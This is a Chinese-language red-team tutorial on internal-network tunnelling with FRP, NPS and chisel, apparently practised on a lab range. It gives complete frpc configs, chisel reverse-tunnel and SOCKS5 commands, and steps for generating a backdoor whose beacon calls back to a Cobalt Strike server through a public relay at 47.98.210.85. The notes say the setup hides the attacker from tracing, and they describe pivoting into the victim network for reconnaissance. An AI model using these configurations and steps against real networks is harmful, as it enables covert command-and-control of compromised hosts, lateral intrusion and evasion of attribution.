FRP代理
1.實現湖北內網控制北京的內網C2上線 2.實現湖北內網探針北京內網 信息收集 (socks建立和端口映射)
1.連接47.98.210.85 7000端口服務端 2.嘗試將服務端的6666轉到127.0.0.1 5555采用tcp協議,備注名proxies
serverAddr="47.98.210.85"
serverPort=7000[[proxies]]
name="test-tcp"
type="tcp"
localIP="127.0.0.1"
localPort=5555
remotePort=6666
如何利用這種情況實現c2上線 監聽器1:47.98.210.85 6666端口 監聽器2:192.168.139.141 5555端口 生成后門用監聽器1 原理就是把內網中的192.168.139.141端口流量轉發到47.98.210.85的6666端口上,我們就可以通過47.98.210.85的6666上線了
后門->47.98.210.85:6666->frp 192.168.139.141 5555->監聽器2->正常上線
如下示例 下圖中的47.98.210.85是公網服務器ip地址
如下的192.168.139.141是c2的ip地址
我們生成后門要使用公網ip的后門來生成,因為目標主機是內網,只可以訪問到公網的ip地址47.98.210.85的6666
當我們的后門攻擊內網機器,然后內網機器回去連接公網服務器,然后公網服務器存在ftps服務,kali客戶端連接的時候會吧公網服務器的6666轉換為本地的5555,然后cs監聽本地的5555,所以就可以上線了
我們來通過實驗說明一下 1.在本地kali上開啟cs服務,然后客戶端連接
2.在kali上運行frpc來配置如上,把遠程服務端的6666端口轉換為本地的5555端口
serverAddr="47.98.210.85"
serverPort=7000[[proxies]]
name="test-tcp"
type="tcp"
localIP="127.0.0.1"
localPort=5555
remotePort=6666
本地kali配置
公網服務器配置
這里我本地一直配置不成功,最后我改了一下服務端的7000端口為7001,可能是端口沖突了
3.使用cs建立監聽器 先建立一個反向鏈接公網服務器6666端口的監聽器,讓客戶端連接公網服務器
然后建立一個監聽器來監聽本地的5555端口,因為frp把公網的6666代理到了本地的5555端口
然后創建一個后門,后門是使用第一個監聽器,通過內網主機去連接公網服務器,然后公網服務器通過frp轉發到本地
然后通過在目標內網執行后門,成功上線到了c2服務器
這個好處就是紅隊在朔源的時候,他找不到我,可以隱藏我自己的身份 通過frp來端口轉發流量
內網穿透來訪問內網 1.在目標內網的windows建立frp的客戶端,然后frps建立在公網服務器中
frps配置如下
frpc配置如下
然后在本地配置proxychain代理去訪問內網服務器
就是下圖中的賬號密碼
最終我可以去訪問和192.168.198.130,因為應該和這個192.168.198.130通往段的ip地址也可以訪問,因為192.168.198.130這個ip可以上網,和47.105.65.102互通,其他的主機192.168.52.0/24這個網段訪問不通,因為是用紅日靶場做的實驗,紅日中器它機器和的網卡用的是僅主機模式沒有網關,也就是沒有路由,所以不通
端口映射和socks5代理方向不同,socks5是外部流量進入,而端口映射是本地流量映射出去,是我發送出去
NPS代理
nps是一款輕量級,高性能,功能強大的內網穿透代理服務器,目前支持udp,tcp流量轉發,可支持任何tcp,udp上層協議訪問內網網站本地支付接口,ssh訪問,遠程桌面,dns解析等,此外還支持內網http代理,外網socks5代理,p2p等,并帶有功能強大的web管理端
1.下載nps,然后上傳到服務端口,直接運行,然后訪問服務端的ip地址加端口8080
通過默認賬號admin和默認密碼123登錄
客戶端連接之后,點擊隧道
然后新增
填寫如下,將服務器的6666轉發到內網的5555端口,就是轉發到執行剛才客戶端命令的5555端口
然后和之前一樣使用兩個監聽器,一個監聽器是6666的公網服務器端口,一個是本地的5555端口,kali機做攻擊機的的話就可以通過隧道建立連接了
socks代理 1.在nps中建立socks代理,如下配置
2.新增,然后選擇socks代理
3.然后配置客戶端,客戶端在目標主機上面建立,也就是被攻擊的內網主機 4.在kali機器上使用代理,然后訪問內網,繼續內網滲透
shisel代理
內網穿透c2上線
建立服務器監聽1234
./chisel?server?-p?1234?--reverse
建立客戶端連接服務端后將141主機的5555給到服務端6666上
./shisel?client?-v?47.98.210.85:1234?R:0.0.0.0:6666:192.168.139.141:5555
后門請求6666,然后kali運行./shisel?client?-v?47.98.210.85:1234?R:0.0.0.0:6666:192.168.139.141:5555去6666轉發給自己的5555,然后自己通過5555進行cs上線
內網穿透信息收集
1.建立socks節點
建立服務器監聽1090
chisel?server?-p?1090?--socks5
2.建立客戶端連接服務端將使用socks服務
chisel?client?47.98.210.85:1090?socks?&
3.使用kali通過服務器ip地址和1090端口進行代理,信息收集